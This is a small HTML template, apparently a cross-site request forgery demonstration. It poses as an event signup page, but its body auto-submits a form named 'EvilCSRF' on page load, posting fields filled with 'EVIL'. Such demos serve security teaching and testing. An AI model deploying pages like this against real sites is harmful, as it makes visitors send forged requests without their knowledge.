<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:th="http://www.thymeleaf.org">
    <head>
        <title>Sign up form</title>
    </head>
    <body onload='document.EvilCSRF.submit()'>

        <h1>Sign up to the event using this form</h1>

        <form action="form" method="POST" name="EvilCSRF">
            <input type="text" name="firstname" id="firstname" value="EVIL"/>
            <input type="text" name="lastname" id="lastname" value="EVIL"/>
            <input type="text" name="address" id="address" value="EVIL"/>
        </form>

        <p></p>
    </body>
</html>